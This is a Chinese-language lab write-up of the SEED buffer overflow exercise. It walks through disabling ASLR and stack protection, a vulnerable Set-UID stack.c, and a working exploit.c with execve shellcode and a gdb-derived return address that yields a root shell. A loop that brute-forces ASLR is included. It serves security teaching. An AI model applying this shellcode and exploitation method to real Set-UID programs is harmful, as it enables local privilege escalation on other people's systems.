一、實驗描述
(實驗描述屬於概況瞭解,詳見實驗步驟)
緩衝區溢出是指程序試圖向緩衝區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩衝器和返回地址的暫時關閉,溢出會引起返回地址被重寫。
緩衝區溢出攻擊是危害最大的攻擊方式之一。爲 了防止緩衝區溢出攻擊,已經研究出了多種保護 機制,比較常用的有:地址空間隨機化、禁止棧 執行、“Stack Guard”三種。爲了演示緩衝區溢出 攻擊的原理,我們將禁用這些機制。本次實驗在 ubuntu虛擬機下運行。
禁止一些安全機制
(1)禁止|允許 地址空間隨機化機制
• sudo su
• dees
• /sbin/sysctl -w kernel.randomize_va_space=0|1
• 或sudo /sbin/sysctl -w kernel.randomize_va_space=0|1
(2)允許或禁止棧執行
• 在編譯c程序代碼時設置
• 允許:gcc -z execstack -o test test.c
• 禁止:gcc -z noexecstack -o test test.c
(3)關閉gcc的Stack Guard
• gcc -fno-stack-protector -o test test.c
二、實驗內容
在seed-ubuntu-12.04 環境下,利用緩衝區溢出漏洞對用程序進行攻擊,從而在其中執行shellcode 達到獲取shell 權限的目的。整個實驗環境會給出一個stack.c 程序和一個exploit.c 程序。
其中,前者stack.c是具有緩衝區溢出漏洞的用戶程序,它會從文件中讀取數據,並拷貝至自己的緩衝區。後者exploit.c則是需要攻擊者精心設計的攻擊程序,它會利用用戶程序的漏洞產生badfile 文件,從而使用戶程序讀取badfile 時,被攻擊者控制。在實驗過程中需要開啓可執行棧選項和關閉地址隨機化選項,從而更容易定位到棧的地址
下載鏈接:
seed-ubuntu-12.04:
http://www.cis.syr.edu/~wedu/seed/lab_env.html
stack.c exploit.c call_shellcode.c:
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/
三、實驗任務
Task 1: Exploiting the Vulnerability
任務一的任務是通過修改攻擊程序,向攻擊程序生成的badfile中寫入適當的地址覆蓋被攻擊程序的返回地址,使其轉向攻擊者想要運行的一段代碼來達到攻擊的目的。
實驗步驟:
1.1初始設置:
Ubuntu和其他一些Linux系統中,使用地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,這使得猜測準確的內存地址變得十分困難,而猜測內存地址是緩衝區溢出攻擊的關鍵。因此本次實驗中,我們使用以下命令關閉這一功能:
sudo sysctl -w kernel.randomize_va_space=0
此外,爲了進一步防範緩衝區溢出攻擊及其它利用shell程序的攻擊,許多shell程序在被調用時自動放棄它們的特權。因此,即使你能欺騙一個Set-UID程序調用一個shell,也不能在這個shell中保持root權限,這個防護措施在/bin/bash中實現。
linux系統中,/bin/sh實際是指向/bin/bash或/bin/dash的一個符號鏈接。爲了重現這一防護措施被實現之前的情形,我們使用另一個shell程序(zsh)代替/bin/bash。下面的指令描述瞭如何設置zsh程序:
sudo su
cd /bin
rm sh
ln -s zsh sh
- 1.2漏洞程序
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];//和原程序不一樣的地方在此處,如果沒有修改,最終結果會是return properly 無法攻擊成功.獲得root權限
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
通過代碼可以知道,程序會讀取一個名爲“badfile”的文件,並將文件內容裝入“buffer”。
編譯該程序,並設置SET-UID。命令如下(以下命令是在root用戶權限下執行的):下面命令不執行或者沒有在root用戶權限下執行都會導致攻擊失敗
gcc -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
GCC編譯器有一種棧保護機制來阻止緩衝區溢出,所以我們在編譯代碼時需要用 –fno-stack-protector 關閉這種機制。
而 -z execstack 用於允許執行棧。
- 1.3攻擊程序
我們的目的是攻擊剛纔的漏洞程序,並通過攻擊獲得root權限。
把以下代碼保存爲“exploit.c”文件,保存到 和stack.c同一目錄下。代碼如下:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
注意上面的代碼,“\x??\x??\x??\x??”處需要添上shellcode保存在內存中的地址,因爲發生溢出後這個位置剛好可以覆蓋返回地址。
而 strcpy(buffer+100,shellcode); 這一句又告訴我們,shellcode保存在 buffer+100 的位置。
現在我們要得到shellcode在內存中的地址,輸入命令(這個命令在seed用戶權限下執行,在root權限下和seed權限下求出的地址不一樣,經過我的嘗試,在Seed權限下執行這個命令,才能攻擊成功):
gdb stack
然後
disass main
結果如下圖:
執行下入所示的三個命令
b *0x080484af//上圖紅線處
r
i r $esp
紅框處得到的就是地址
根據語句 strcpy(buffer+100,shellcode); 我們計算shellcode的地址爲 0xbffff150(十六進制)+100(十進制)=0xbffff1b4(十六進制)
現在修改exploit.c文件!將 \x??\x??\x??\x?? 修改爲 \xb4\xf1\xff\xbf
然後,編譯exploit.c程序(在seed下運行):
gcc -o exploit exploit.c
- 3.4 攻擊結果
可見,通過攻擊,獲得了root權限!
可能的錯誤
(1)如果不能攻擊成功,提示”段錯誤“,那麼請重新關掉地址隨機化,使用gdb反彙編,計算內存地址。
(2)如果返回的結果是return propertly,可能是stack.c程序的緩衝區設置有誤,改爲12
(3)如果獲得的不是#,而是$,是因爲stack.c編譯的時候沒有在root下編譯,並且沒有修改編譯後的stack的權限,即沒有執行chmod u+s stack.
Task 2: Address Randomization
任務二的任務是將ubuntu的地址隨機化選項開啓,重新編譯stack文件,運行時發現出現段錯誤。分析發現地址隨機化是使進程的地址空間隨機化,將進程的mmap基址,stack和vdso頁面地址在每次運行時不固定。這樣一來進程在運行時的地址將變得跟蹤困難,並且攻擊程序較難獲得確切的地址來填入badfile使得跳轉到自己攻擊的shellcode代碼。通過多次運行可以增加地址命中的概率但是也會相應地增加被發現的風險。
大致意思就是循環運行stack,直到攻擊成功
實驗步驟:
sudo su
/sbin/sysctl -w kernel.randomize_va_space=2
sh -c "while [ 1 ]; do ./stack; done;"
此時會一直執行stack,可能一個小時兩個小時….
如果等的不耐煩了,可以在另一個命令行裏關閉地址隨機化試試,立馬能返回和task1一樣的結果,獲得root用戶權限.